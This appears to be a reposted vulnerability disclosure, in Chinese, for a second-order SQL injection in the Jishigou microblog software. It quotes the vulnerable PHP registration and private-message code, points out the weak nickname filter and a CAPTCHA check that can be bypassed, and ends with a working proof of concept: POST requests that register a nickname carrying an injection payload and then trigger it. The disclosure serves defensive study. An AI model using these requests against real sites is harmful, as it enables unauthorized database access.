新闻资讯
   (今日关注·网络安全审查)新闻链接:为了咱们的网络安全,国家放过哪些大招?
   2017(第六届)中国信息化和工业化融合发展高峰论坛即将举办
   构建安全清朗的网络环境——我国网络社会治理能力持续提升
   (今日关注·网络安全审查)新闻链接:为了咱们的网络安全,国家放过哪些大招?
   万余网友吐槽360弹窗恐吓欺骗用户
   黑客组织要发动全球攻势
漏洞公告 
   记事狗微博二次注射漏洞
   苹果再遇数据安全挑战 黑客目标直指用户ID
   nginx爆整数溢出漏洞
   日媒:朝鲜培育数千名“黑客精英” 加强“网络攻击”
   谷歌举办黑客大会探讨谷歌眼镜特性
   分享黑客最常利用的那些漏洞
您的位置: 首页 >> 新闻资讯/漏洞公告
详细内容
记事狗微博二次注射漏洞
2014-2-21 13:39:18  
 
-

漏洞作者: Chora

提交时间: 2013-11-19 22:57
公开时间: 2014-02-17 22:57

漏洞类型: SQL注射漏洞
modules/member.mod.php

function DoRegister()

{

......

/**

* 验证码检查

* 如果开启了注册验证码检查,就校验

*/

if ($this->Config['seccode_enable']>1 && $this->Config['seccode_register'] && $this->yxm_title && $this->Config['seccode_pub_key'] && $this->Config['seccode_pri_key']) {

//我们可以看到用了&&而不是||,所以在这个页面注册根本不需要注册码,导致了自动化攻击的实现。

$YinXiangMa_response=jlogic('seccode')->CheckYXM(@$_POST['add_YinXiangMa_challenge'],@$_POST['add_YXM_level'][0],@$_POST['add_YXM_input_result']);

if($YinXiangMa_response != "true"){

$this->Messager("验证码输入错误",-1);

}

}

/* 邀请处理 */

$inviter_member = array();

$invite_code = ($this->Post['invite_code'] ? $this->Post['invite_code'] : $this->Get['invite_code']);

$check_result = jsg_member_register_check_invite($invite_code);

if($regstatus['invite_enable'] && !$regstatus['normal_enable'])

{

if(!$invite_code)

{

$this->Messager("本站目前需要有好友邀请链接才能注册。<br><br>看看<a href=\"?mod=topic&code=top\">达人榜</a>中有没有你认识的人,让他给你发一个好友邀请。", null);

}

if(!$check_result)

{

$this->Messager("对不起,您访问的邀请链接不正确或者因邀请数已满而失效,请重新与邀请人索取链接。", null);

}

}

if($check_result['uid'] > 0)

{

$inviter_member = jsg_member_info($check_result['uid']);

}

if(!$inviter_member && $this->Config['register_invite_input'])

{

$inviter_member = jsg_member_info($this->Post['inviter_nickname'], 'nickname');

}

/* 接收变量 */

$password = $this->Post['password'];

$email = $this->Post['email'];

$username = $nickname = $this->Post['nickname'];

/* 密码过滤 */

if(strlen($password) < 5) {

$this->Messager("密码过短,请设置至少5位",-1);

}

if($password != $this->Post['password2']) {

$this->Messager("两次输入的密码不相同",-1);

}

if($GLOBALS['_J']['plugins']['func']['reg']) {

hookscript('reg', 'funcs', array('param' => $this->Post, 'step' => 'check'), 'reg');

}

/* 进行注册 */

$uid = jsg_member_register($nickname, $password, $email);//跟进0x01

......

}

include/class/passport.class.php

function register($nickname, $password, $email, $username = '', $ucuid = 0, $role_id = 0) {

......

$nickname = trim(strip_tags($nickname));

$jsg_result = $this->checkname($nickname, 1, $ucuid);//跟进

if($jsg_result < 1) {

return $jsg_result;

......

$timestamp = time();

$sql_datas = array();

$sql_datas['ucuid'] = $ucuid;

$sql_datas['salt'] = jsg_member_salt();

$sql_datas['password'] = jsg_member_password($password, $sql_datas['salt']);

$sql_datas['nickname'] = $nickname;

$sql_datas['username'] = ($username ? $username : '');

$sql_datas['email'] = $email;

$sql_datas['role_type'] = 'normal';

$sql_datas['role_id'] = (int) ($GLOBALS['_J']['config']['reg_email_verify'] ? $GLOBALS['_J']['config']['no_verify_email_role_id'] : $GLOBALS['_J']['config']['normal_default_role_id']);

$sql_datas['invitecode']= substr(md5(random(32)),-16);

$sql_datas['regdate'] = $sql_datas['lastactivity'] = $timestamp;

$sql_datas['regip'] = $sql_datas['lastip'] = $ip;

if ($GLOBALS['_J']['config']['extcredits_enable'])

{

$credits = ConfigHandler::get('credits');

foreach ($credits['ext'] as $_k=>$_v)

{

if ($_v['enable'] && $_v['default'])

{

$sql_datas[$_k] = (int) $_v['default'];

}

}

}

DB::query("insert into `" . TABLE_PREFIX . "members` (`" . implode("`,`", array_keys($sql_datas)) . "`) values ('".implode("','",$sql_datas)."')"); //这里入库。

......

}

function checkname($username, $is_nickname = 0, $ucuid = 0, $check_exists = -1) {

$username = trim(strip_tags($username));

$username_len = jstrlen($username);

$ulmax = ($is_nickname && true !== UCENTER ? 50 : 15);//50位足够利用,只要你的语句足够短,所以该例我用了一个回显的注入,而不是盲注,那样就能增加可用数量。

$nickname_length = (int) $GLOBALS['_J']['config']['nickname_length'];

$is_nickname && $ulmax = !$nickname_length ? $ulmax : ($nickname_length >$ulmax ? $ulmax : $nickname_length);

if($username_len < 3 || $username_len > $ulmax)

{

return -1;

}

if($ucuid < 1)

{

if(is_numeric($username)) {

return -1;

}

if($is_nickname)

{

if(false != preg_match('~[\<\>\?\@\$\#\[\]\{\}\s]+~',$username)) //虽然过滤了空格跟其他字符,但是我们可以提交/**/来绕过。

{

return -1;

}

}

else

{

if((false == preg_match('~^[\w\d\_]+$~',$username)))

{

return -1;

}

}

}

......

}

modules/ajax/pm.mod.php

function send()

{

$uid = intval($this->Post['uid']);

$member = DB::fetch_first("SELECT nickname FROM ".DB::table("members")." WHERE uid='{$uid}'");

if (empty($member)) {

Mobile::error("No User", 300);

}

$to_user = $member['nickname']; //出库

$data = array(

'to_user' => $to_user,

'message' => trim($this->Post['message']),

);

$ret = $this->MyPmLogic->pmSend($data);//跟进0x02

if ($ret == 0) {

Mobile::success("Success");

} else if ($ret == 1) {

Mobile::error("Content not emtpy", 420);

} else if ($ret == 2) {

Mobile::error("Content not emtpy", 321);

} else if (ret == 3) {

Mobile::error("Content not emtpy", 321);

}

Mobile::error("Unkonw error", 250);

}

include/logic/pm.logic.php 0x02

function pmSend($post,$suid=MEMBER_ID,$susername=MEMBER_NAME,$snickname=MEMBER_NICKNAME){

if(jaccess('pm','send', $suid)==false) {

return 6;

}

$to_user_list=array();

$f_rets = filter($post['message']);

if($f_rets)

{

if($f_rets['error'])

{

return $f_rets['msg'];

}

}

$post['subject']=jhtmlspecialchars(trim($post['subject']));

if($post['message']=='')

{

return 1;

}

if ($post['buddy_list']==false && $post['to_user']=="")

{

return 2;

}

if(trim($post['to_user'])!='')

{

$in=$this->DatabaseHandler->BuildIn($post['to_user'],"nickname");

$sql="

SELECT

`uid`,`username`,`nickname`,`notice_pm`,`email`,`email_checked`,`newpm`,`at_new`,`event_new`,`fans_new`,`vote_new`,`qun_new`,`dig_new`,`channel_new`,`comment_new`,`user_notice_time`,`lastactivity`

FROM

".TABLE_PREFIX.'members'."

WHERE

$in";

$query = $this->DatabaseHandler->Query($sql);//引入引号进行注入。

while($row=$query->GetRow())

{

......

}

POST

email=www@wooyun.org&password=12345&password2=12345&nickname=woo

http://localhost/jishigou/index.php?mod=member&code=doregister

先注册一个woo用户,用于回显。

然后POST

email=Chora@wooyun.org&password=12345&password2=12345&nickname=woo')and/**/1=1/**/and('1

http://localhost/jishigou/index.php?mod=member&code=doregister

引入注入语句。

然后访问自己的主页,查看自己的UID。

最后POST

uid=你的UID&message=wooyun

http://localhost/jishigou/mobile/ajax.php?mod=pm&code=send

出发注入。